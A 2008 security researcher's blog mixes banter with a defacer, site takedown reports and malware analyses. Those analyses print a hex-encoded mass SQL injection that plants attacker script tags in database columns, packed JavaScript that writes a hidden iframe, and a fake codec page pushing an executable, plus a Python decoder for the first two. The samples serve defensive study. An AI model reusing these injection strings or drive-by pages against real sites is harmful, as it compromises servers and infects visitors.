Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 30 September 2008

cr4nk responds - OH NOEZ!

Alas poor skiddie, for thou shall be ridiculed! ..... On Tuesday 28th Sept, I sent the following to our dear cr4nk, as I was in a funny mood (I get like that occasionally) and fancied having a laugh. I never expected a response, but boy am I glad he did (it took a week, but he finally got there lol);

Dear cr4nk,
     I'd like to thank you for playing "how to be an unsuccessful skiddie" and giving me the opportunity to shut down your website (I really did enjoy doing that). Alas it would appear you've still not learnt, however, so rest assured, we'll be following you until you stop attacking people's servers.


One week later, and it seems that whilst his spelling leaves a lot to be desired, he did actually respond ..... and OH NOEZ! the "leet" skiddie (sorry, "genius hacker" LOL!) is telling me to err - shut up?

well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


... and he must be feeling rather bold - he's not even bothered to try and disguise where his e-mail is coming from, lol.

Exported by: Outlook Export v0.1.2


From: cr4nk@land.ru
E-mail:cr4nk@land.ru [ 82.204.219.251 - pochta.ru ]
Date: 01/10/2008 00:47:01
Subject: Re: Woops
**************************************************************************
Headers
**************************************************************************
Return-Path: <cr4nk@land.ru>
Delivered-To: services@[RM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-124.livemail.co.uk (Postfix) with SMTP id 8621B8A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from web22.pochta.ru (web22.pochta.ru [82.204.219.122])
by smtp-in-124.livemail.co.uk (Postfix) with ESMTP id 706378A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from [127.0.0.1] (helo=localhost)
by web22.pochta.ru ( sendmail 8.13.3/8.13.1) with esmtp id 1Kkovl-0001E7-RC
for services@[RM]; Wed, 01 Oct 2008 03:47:01 +0400
Message-ID: <20081001034701.dw3sqc7b40g4480g@www.pochta.ru>
Date: Wed, 01 Oct 2008 03:47:01 +0400
From: cr4nk@land.ru
To: Steven <services@[RM]>
Subject: Re: Woops
In-Reply-To: <00e301c920fc$a58cb800$0c00a8c0@THCP>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_69eh72h9ns00"
Content-Transfer-Encoding: 7bit
X-Mailer: Free mail service Pochta.ru; WebMail Client; Account:
cr4nk@land.ru
X-Proxy-IP: [84.187.66.163]
X-Originating-IP: [84.187.66.163]
X-Original-To: services@[RM]


Is it just me, or are these young kids getting too big for their boots? First PRMF thanks me for shutting down his site, swears a bit, then invites me to find and shut down the rest, and now this "d00d", with all of his self-confessed "genius", can also only come up with a "shut up" and profanity.

I remember when skiddies actually had some cojones ..... But in the meantime, I'm happy to report, some friends and I have been locating sites that have been "hacked" by cr4nk and his little group of nut jobs and have been getting them either shut down or cleaned (depending on the owner/hosting co).

If you've been a victim of cr4nk, feel free to drop him an e-mail and give him your thoughts - he seems to like it (but don't forget to report the attack to the authorities and/or your hosting company too).

/edit

Rofl, not long after posting this, he followed up with;

basstard u think u can stop us. we will hack the world man. so we are not some script kiddis we are writing our own exploits also shut up and FUCK YOU

AV's throwing virus warnings for the hpHosts blog and forums

This is a quick note for those of you seeing virus warnings for the hpHosts blog and forums. These are false positives, caused by the AVs detecting the malicious code posted here (obviously a good thing), but evidently not realising that, posted as text, it isn't able to do any harm.

Avast, Avira and the developers of LinkScanner have been contacted. In the meantime, if it will make you feel safer (and indeed I'd recommend doing it anyway), disable scripts when visiting the blog/forums.

/edit

Whilst doing some testing, I've noticed Avira (the one I've got) only flags it when the blog is loaded in Trident-based shells such as Avant Browser/Internet Explorer (with or without scripts enabled) - it doesn't flag it when loaded in Opera.

Hex injection, they are persistent .......

If you've read this blog at all lately, you'll no doubt have read the previous entries I've made concerning this, and hilariously, they're still trying - evidently not realising their attempts aren't going to work.

The latest attempt comes from 201-92-227-227.dsl.telesp.net.br (IP: 201.92.227.227), and is in the same form as previously;

2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E706F726D63652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 0


The part we're interested in, as before, is the hex between CAST( and %20AS%20VARCHAR (%20 is the URL-encoded space character, so this translates to AS VARCHAR). This time the hex decodes to;

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pormce.ru/script.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This shows us they've got another URL, pormce.ru. If we run this through vURL we see;

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}',58,58,'||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID||userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|toGMTString|3600|1000|update|expires|getTime|Date'.split('|'),0,{}))


Which is the usual obfuscation rubbish we're used to, and it's very easily decoded using Malzilla;

window.status="";n=navigator.userLanguage.toUpperCase();if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){var $a=document.cookie;var $b=$a.indexOf("cvbest=");if($b!=-1){}else{var $c=new Date();$c.setTime($c.getTime()+3*3600*1000);document.cookie="cvbest=update;expires="+$c.toGMTString();try{document.write("<iframe src=http://deryv.ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>")}catch(e){}}}


This shows us another URL, this time pointing to deryv.ru. This script contains two more scripts that I've not decoded yet, but they're very similar to the previous Asprox injections.
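An added example, not the blog's own tooling nor vURL or Malzilla: a Python script that does the two decoding steps above offline, pulling the CAST(0x...) hex out of the IIS log line and decoding it to the T-SQL it hides, then unpacking the p,a,c,k,e,d blob served from the injected URL and lifting the iframe URL out of the result. The log line and the packed blob are the ones quoted above; the benign log line and all function and regex names are my own.

```python
import re
from urllib.parse import unquote

# --- inputs: the injection log line and the packed script quoted in the post above ---
HEX_PAYLOAD = "4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E706F726D63652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220"
LOG_LINE = (
    "2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + HEX_PAYLOAD
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;"
    "+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 0"
)
# Constructed, non-malicious request to the same page, for contrast.
BENIGN_LINE = "2008-09-30 20:09:01 GET /pest.asp show=8.15.231. 80 - 192.0.2.10 Mozilla/4.0 - 200 0 0"
PACKED_BLOB = r'''eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}',58,58,'||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID||userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|toGMTString|3600|1000|update|expires|getTime|Date'.split('|'),0,{}))'''

# --- step 1: the hex-encoded CAST() trick -------------------------------------------------
# Decode %XX first so "%20AS%20VARCHAR" becomes "AS VARCHAR" before matching.
CAST_HEX_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+VARCHAR", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']?([^\s\"'>]+)", re.IGNORECASE)


def decode_cast_hex(log_line):
    """Return the T-SQL hidden inside CAST(0x... AS VARCHAR), or None if the line carries none."""
    m = CAST_HEX_RE.search(unquote(log_line))
    if not m:
        return None
    return bytes.fromhex(m.group(1)).decode("latin-1")


def injected_script_urls(sql):
    """The <script src=...> URLs the decoded UPDATE loop would append to every text column."""
    return SCRIPT_SRC_RE.findall(sql)


# --- step 2: the eval(function(p,a,c,k,e,d){...}) packer ----------------------------------
PACK_ARGS_RE = re.compile(
    r"\}\('(?P<p>.*?)',(?P<a>\d+),(?P<c>\d+),'(?P<k>.*?)'\.split\('\|'\),\d+,\{\}\)\)", re.DOTALL)
IFRAME_SRC_RE = re.compile(r"<iframe\s+src=[\"']?([^\s\"'>]+)", re.IGNORECASE)
ALNUM36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def _token(c, a):
    """Port of the packer's e(): index -> short token (base-36 digit, or 'A'.. for values above 35)."""
    head = "" if c < a else _token(c // a, a)
    c %= a
    return head + (chr(c + 29) if c > 35 else ALNUM36[c])


def unpack_packed_js(blob):
    """Rebuild the original script by swapping every token in p for its entry in the word list k."""
    m = PACK_ARGS_RE.search(blob)
    if not m:
        return None
    p, a, c = m.group("p"), int(m.group("a")), int(m.group("c"))
    words = m.group("k").split("|")
    # Same table the packer builds: d[e(i)] = k[i] || e(i).  Tokens missing from the table are
    # left alone (the packer would turn them into "undefined"; keeping them is more readable).
    table = {}
    for i in range(c):
        tok = _token(i, a)
        table[tok] = words[i] if i < len(words) and words[i] else tok
    return re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), p)


def next_hop_urls(js):
    """The iframe URL(s) the unpacked script would document.write() into the page."""
    return IFRAME_SRC_RE.findall(js)


if __name__ == "__main__":
    sql = decode_cast_hex(LOG_LINE)
    print("decoded SQL :", sql)
    print("injects     :", injected_script_urls(sql))
    js = unpack_packed_js(PACKED_BLOB)
    print("unpacked JS :", js)
    print("next hop    :", next_hop_urls(js))
```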

hpHosts - Updated September 30th, 2008


The hpHOSTS Hosts file has been updated. There is now a total of 50,909 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

Latest Updated: 30/09/2008 21:30
Last Verified: 30/09/2008 21:00
Download hpHosts now!
http://hosts-file.net/?s=Download

hpHosts - The largest removal to date!

I'm running the final pass validation for the latest release of hpHosts as I write this, and I've noticed something over the last week. When I started the validation process, there were around 4800 or so domains not resolving. Up to this current pass, that's been reduced to just over 4000. However, all of these have thus far failed to resolve.

This makes it by far the biggest removal to date for hpHosts. Whether this is directly connected to the Atrivo/Intercage/Est Domains farce is anyone's guess, but I'm betting it's certainly got a lot to do with it.

The final pass should be done within the hour, and once those still not resolving are moved from the database, to a monitoring list, I'll begin the prep for the actual release itself - hopefully this should be out by 23:00 (approx 3 hours or so)

/edit

The final number removed is: 4075

Saturday, 27 September 2008

PRMF: 0, good guys: 1

Okay, so I don't have a really cool name like The Goddamn Batman, nor do I have a beat stick - but I do take a rather perverse pleasure nonetheless, in shutting down idiots that are stupid enough to ask on the WOT forums if their site's rating can be changed to green instead of yellow.

I am of course, talking about PRMF, who in August, wrote (partial quote) in the WOT forums;

I know, this website have SPAM this forum, but the owner don´t know that, and says SORRY in name of all the comunity...
But it´s a safe forum... Why yellow?
Please,check this....


Two problems here, firstly, the person posting this IS the owner of the site in question so either he's talking about himself in the third person, or he thinks those in the WOT forums are stupid ...... sadly further on, we saw it was actually the latter, when after being shown some of the problems with his site, he wrote;

The section XXX is only available to users over 18 per registration, no child has access to the areas , and that comments is to try make my rating up... If they was wrong, i´m sorry and coul delete them? Thanks...

In prmf.realmsn.com/Parceiros-h1.htm its in big red letters that
"O PRMF Fórum não se responsabiliza pelo conteúdo de qualquer site em baixo. São da exclusiva responsabilidade de cada um dos seus autores"
in english:
"The PRMF Forum is not responsible for the content of any site below. They are the sole responsibility of each of its author"

then all those websites are not of my responsibility and I have nothing to do with it and her contents ...

Thanks you!

PRM


In this particular comment, he was referring to the malware I showed him he was linking to, and the XXX section of his site, that was (contrary to his claims) available to kids (more on this further on) - naughty naughty. Further to this, he stupidly admitted that he commented so many times on his site's scorecard in order to try and manipulate the site's rating - this isn't going too well so far, and it's about to get worse.

On September 1st, he proudly mentioned his XXX section was gone - and it was, so we focused on the other problem - his site offering warez. Whilst researching his site a little more, I noticed an increasing issue with the account I was using. Mentioning this on the WOT forums, he claimed my account had not been deleted, but in fact had been put back into verification - then an e-mail from his site proved my original theory, that he had deleted my account, correct;

Translated version of the e-mail;

"You received this email autopilot because its account at "..::: PRMF Forum :::.." -- hxxp://prmf.realmsn.com has just been excluded.
To know precisely the reasons for exclusion, contact the administrator."

Original;

"Você recebeu este e-mail automatico porque a sua conta em "..::: PRMF Fórum :::.." - hxxp://prmf.realmsn.com acabou de ser excluída.
Para conhecer precisamente os motivos da exclusão, entre em contato com o administrador."


Woops? Way to look legit there - lock out the researcher. Unfortunately for this idiot, he obviously didn't realize that it simply takes a matter of milliseconds to create a new account.

On September 2nd, I decided to check his site again, and was surprised to find he'd re-included the XXX section (obviously he'd not gotten rid of it - just hidden it, as all the content was still there). Mentioning this on the forums and further mentioning the fact his site was still offering warez, I was not surprised to note that to date - he's not been back. Evidently realizing that researchers aren't newbies that can be fooled so easily.

On September 23rd, I decided to revisit the site to see what if anything, had changed. Sadly, it had only changed for the worse. His site was still offering warez, still allowing kids to access the porn section - and now made matters worse as I found a couple of the posts in the XXX section that were quite clearly child pornography.

Warez was bad enough, allowing kids to access porn is bad enough - but to allow your users to post what is blatantly underage porn is unforgivable - and not something I take lightly. I decided enough was enough and reported his site not only to MET (UK Police), but also to CEOP (Child Exploitation and Online Protection Centre) and the IWF (Internet Watch Foundation).

Further to this, I also reported his site to the company that provided his forums, their upstream provider, and their registrars. The reason I did not report this only to the company providing these forums is that in the past when I've done this, it's resulted in nothing being done. Taking a multi-pronged approach almost always guarantees someone is going to do something.

Thankfully my approach worked as checking the site again on September 27th, I was presented with the following notice;



Translated;



I didn't get a reply from anyone I reported the site to, and to be honest - I'm not bothered - something was done, that's the main thing.

References

Yellow?
http://www.mywot.com/en/forum/1486-yellow

PRMF.Realmsn.com Scorecard
http://www.mywot.com/en/scorecard/prmf.realmsn.com

Reporting Child Pornography

IWF (Internet Watch Foundation)
http://www.iwf.org.uk/reporting.htm

CEOP (Child Exploitation and Online Protection Centre)
http://www.ceop.gov.uk/ceop_report.aspx

National Center for Missing & Exploited Children
https://secure.missingkids.com/missingkids/servlet/CybertipServlet?LanguageCountry=en_US

International Agencies
http://vachss.com/help_text/report_child_porn_intl.html

Friday, 26 September 2008

Full Circle Magazine: Issue 17 is here!

I've been an avid reader of this since coming across it several releases ago, and am happy to say that the latest release is now available.

What is Full Circle Magazine?

Full Circle is a free, independent, magazine dedicated to the Ubuntu family of Linux operating systems.

Description courtesy of the FCM website; whilst mostly true, a lot of the stuff in their magazines is actually applicable to other Linux distros too :o), and whilst not mentioned, their magazines are provided as downloadable PDFs.

Whats in the latest release?
  1. Command and Conquer - Nano & Vim.
  2. How-To : Program in C - Part 1, Connect to IRC, Using GIMP - Part 6 and Scan & Convert to PDF.
  3. My Story - …When I Was Two
  4. My Opinion - Is This The Year?
  5. MOTU Interview - Harald Sitter
  6. Top 5 - Email Notifiers
Great! Where can I download it?

You can download the latest release at;

http://fullcirclemagazine.org/issue-17/

... and previous releases from;

http://fullcirclemagazine.org/downloads/

RSS Feed:
http://fullcirclemagazine.org/feed/

Bits from Bill: Vote2008 WinPatrol Discount Coupon

Like Bill, I'm no expert on politics either, but personally - I'd give every UK votizen the same discount just to vote out Labour if it had been me ......

Anywho, for those of you that don't have WinPatrol Plus yet (why not??????), Bill is offering a $10 discount (I'm not up on exchange rates, but I believe it's around £20) to those that purchase WinPatrol Plus until, as Bill puts it;

.... a reasonable agreement is reached to prevent additional collapse in the financial market


I've absolutely no idea what that means or refers to as I don't follow UK politics let alone US politics, but I'm guessing that means something bad is happening?

Read Bill's full post on this subject at;

Bits from Bill: Vote2008 WinPatrol Discount Coupon

If for some unknown reason (and it has to be unknown as I can't think of a single reason not to have it!) you don't actually have WinPatrol yet - GET IT!. You can download it for free (tis the non-PLUS version) from;

www.winpatrol.com

Amazing books! (HIDDENEXT/Worm.Gen and Troj/Agent-HTC)

There are two problems with these e-mails ..... firstly, I did not write a book, and secondly, even if I had, they're under the misconception that I can actually write good books LOL!

Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff. It's certainly this year's best in its genre. You seem to never going to quit surprising us. We have made a contract with you and guarantee that the first edition will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


The attachment (31K) is named approved.zip and contains a file named "approved.doc[MANY_SPACES].exe" and detection for it is rubbish;

http://www.virustotal.com/analisis/c4b44222d1d498c795f220989921693a


The e-mail in all of its glory;

Subjects thus far:

Amazing Book
Excellent Book

Exported by: Outlook Export v0.1.2


From: Susana Hurley
E-mail:unwhchm@bostoncf.com [ - Invalid IP was passed to me ]
Date: 26/09/2008 16:18:01
Subject: Amazing Book
**************************************************************************
Headers
**************************************************************************
Return-Path: <unwhchm@bostoncf.com>
Delivered-To: services@[RMD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4FBE466E6E3
for <services@[RMD]>; Fri, 26 Sep 2008 16:18:03 +0100 (BST)
Received: from [163.153.27.216] (unknown [163.153.27.216])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id E685566E6D4
for <burnservices@[RMD]>; Fri, 26 Sep 2008 16:18:01 +0100 (BST)
Received: from [163.153.27.216] by mail.global.frontbridge.com; Fri, 26 Sep 2008 10:18:01 -0500
Date: Fri, 26 Sep 2008 10:18:01 -0500
From: "Susana Hurley" <unwhchm@bostoncf.com>
X-Mailer: The Bat! (v3.71.01) Professional
Reply-To: unwhchm@bostoncf.com
X-Priority: 3 (Normal)
Message-ID: <787369064.27570604130467@bostoncf.com>
To: burnservices@[RMD]
Subject: Amazing Book
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----------8401675F8425842C"
X-Original-To: burnservices@[RMD]

Royal Navy won't fight pirates 'in case they claim asylum'

Normally this wouldn't catch my attention, I couldn't care less about our armed forces - they've been a joke for a very long time (not their fault, it's those in charge we've got to blame), but this is just pathetic.

British Foreign Office officials are understood to have advised the Royal Navy not to confront or arrest pirates in the region for fear of transgressing human rights legislation or encouraging their seeking asylum once taken to the UK.


http://www.theregister.co.uk/2008/09/25/royal_navy_pirate_asylum_seekers/

My brother's in the Navy - think I'll see if I can get hold of him and ask about this. Personally, I think the Navy should tell those in charge to shove it, and blow the pirates out of the water - they couldn't care less about human rights, so why should the Navy care about theirs?

In the meantime, the comments by Nick pretty much sum up my thoughts;

They used to say that an Englishman could safely walk across the breadth of the British empire unprotected because no one dared provoke the armed forces. Maybe I should practice my French instead...

Kentucky (secretly) commandeers world's most popular gambling sites

I tend to agree with a lot of the commenters on the article that this has far-reaching implications, and Kentucky shouldn't have been allowed to do this. However, I've also got a more important question - why didn't they go after the sites that actually infect people? That would've been a much better idea.

The state of Kentucky has seized control of some of the world's most popular gambling domain names courtesy of a state judge who issued a secret ruling last week ordering registrars to transfer 141 internet addresses to the state's top law enforcement official.

The order (PDF) by Franklin County Circuit Judge Thomas Wingate applies to sites including absolutepoker.com, goldenpalace.com, and ultimatebet.com. The websites, many of which are operated outside US borders, stand accused of illegally making their services available to Kentucky citizens. Already, whois records list goldencasino.com as the rightful property of J. Michael Brown, the Justice and Public Safety secretary who filed the lawsuit. At time of writing, goldencasino.com and the handful of other affected websites we checked appeared to be offering unfettered online gambling services.


Read the full article at El Reg;

http://www.theregister.co.uk/2008/09/26/gambling_domain_seizure/

Wednesday, 24 September 2008

Mylot.com codec infection madness!

Public profiles are a great way to tell people about yourself, just look at the hundreds of sites that offer such a feature. These features however, can be just as bad for the visitor. Take the following for example;



This profile contains a lovely little link that takes you to;

http://superelectionpolls.info/Teens_Video.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/Teens_Video.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:08:48
*****************************************************************
<head>
<title> HOT VIDEO SENASTION ONLY HERE!!!</title>
<meta http-equiv="Content-Language" content="en-us" >
<meta name="robots" content="index, follow" >
<META NAME="Keywords" CONTENT="full on bush,george bush on obama"/>
<meta name="description" content="full on bush, nunn bush penny loafer, zshare jennifer bush, full on bush, bush ak20 television user manual, bush iraq troop reduction/">
<meta name="revisit-after" content="2 days">
<meta name="rating" content="general">
</head>
<p><IFRAME src="test.html" width="1200" height="1000"
scrolling="auto" frameborder="1">
</IFRAME>
</p>
<br>


As you can see, this loads an iFrame that then loads;

http://superelectionpolls.info/test.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/test.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:47:48
*****************************************************************
<html>
<head>
<title>
fastguidan.info
</title>
</head>
<BODY bgcolor="FFFFCC">
<script type="text/javascript" language="javascript">
eval(unescape("myvar1%3D5462%3B%0D%0Amyvar4%3Dmyvar1%3B%0D%0Aif%28myvar1%3D%3Dmyvar4%29%20document%2Elocation%3D%22http%3A%2F%2Falldebt%2Ebiz%2Fnewway%2Fin%2Ecgi%3F5%22%3B%0D%0A"));
</script>

</body>

</html>


This then loads the following little script;

eval(unescape("myvar1=5462;
myvar4=myvar1;
if(myvar1==myvar4) document.location="http://alldebt.biz/newway/in.cgi?5";
"));


Which as you can see, takes you to;

http://alldebt.biz/newway/in.cgi?5

.... which is where the fun begins. alldebt.biz uses a 302 redirect;

HTTP/1.1 302 Found
Date: Wed, 24 Sep 2008 22:27:29 GMT
Server: Apache/1.3.36 (Unix) mod_fastcgi/2.4.2 PHP/5.1.4 FrontPage/5.0.2.2510
Set-Cookie: SL_5_0000=_5_; domain=alldebt.biz; path=/; expires=Thu, 25-Sep-2008 22:27:29 GMT
Location: http://theprivatetube.com/1/0/0/693/0/white/
Transfer-Encoding: chunked
Content-Type: text/html


Which as you can see, takes us to theprivatetube.com, which loads;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://alldebt.biz/newway/in.cgi?5
Server IP: 72.232.180.163 [ 163.180.232.72.static.reverse.ltdomains.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 5
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:49:38:49
*****************************************************************
<html>
<head>
<title>Free movies online</title>
<style>
#alertMessage {
background: #000000 url(/error.png) no-repeat scroll 0pt;
height: 129px;
visibility: hidden;
width: 384px;
z-index: 2;
position: absolute;
}

body {
background-color: white;
font-family:Tahoma;
align:center;
}
</style>
<script>

function simpleRedirect()
{
document.getElementById("alertMessage").style.visibility = "hidden";
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function openCodec()
{
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function alertInstall()
{
alert("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library.");
openCodec();
}

function askInstall()
{
if (confirm("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library."))
simpleRedirect();
else
alertInstall();
}

function hideAlert()
{
document.getElementById("alertMessage").style.visibility="hidden";
simpleRedirect();
}

function docLoad()
{
document.body.onbeforeunload="askInstall();return false";
}
</script>
<script src="/dnd.js"></script>
</head>
<body>
<div style="font:17px Tahoma;color:black;" align="center">

</div>
<div id="alertMessage" onmousedown="this.style.zIndex=10;StartDrag(event,this,PutBack)" name="errorMsg">
<div id="alertTitle"
style="position: relative; top: -14px; left: 360px; width: 20px; height: 20px; font-size: 14px; color: white; font-weight: bold; border: none"
onclick="hideAlert();">
<div style="display: none"> </div>
</div>
<div id="alertText"
style="position: relative; top: 20px; left: 60px; width: 300; font-size: 12px; font-name: Arial">
Windows Media Player cannot play the file. The Player does not support the format you are trying to play. Please install video codec update.</div>
<div id="alertButtons"
style="position: relative; top: 30px; left: 100px" /><input
type="button" onclick="simpleRedirect()"
value="  Ok  " /> <input type="button"
onclick="simpleRedirect();" value="  Cancel  " />
<input type="button" onclick="simpleRedirect()"
value="  Continue  " /></div>
</div>

<table width="100%" align="center" valign="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="center"><img src="/img/prev_1_0.png"
onclick="simpleRedirect();" style="border: 1px solid white" /></td>
</tr>
</table>
<script>
<!--
setTimeout("showAlert();", 1000);

function showAlert()
{
var p=document.getElementById("alertMessage");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-145;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
-->

</script>
</body>
</html>


This then loads a 187K executable;

http://theprivatetube.com/cd/693/0/wmcodec_update.exe

Which Avira kindly flagged for me .........



VT results for wmcodec_update.exe;

http://www.virustotal.com/analisis/fb970f590465d2da92b161aac1706893
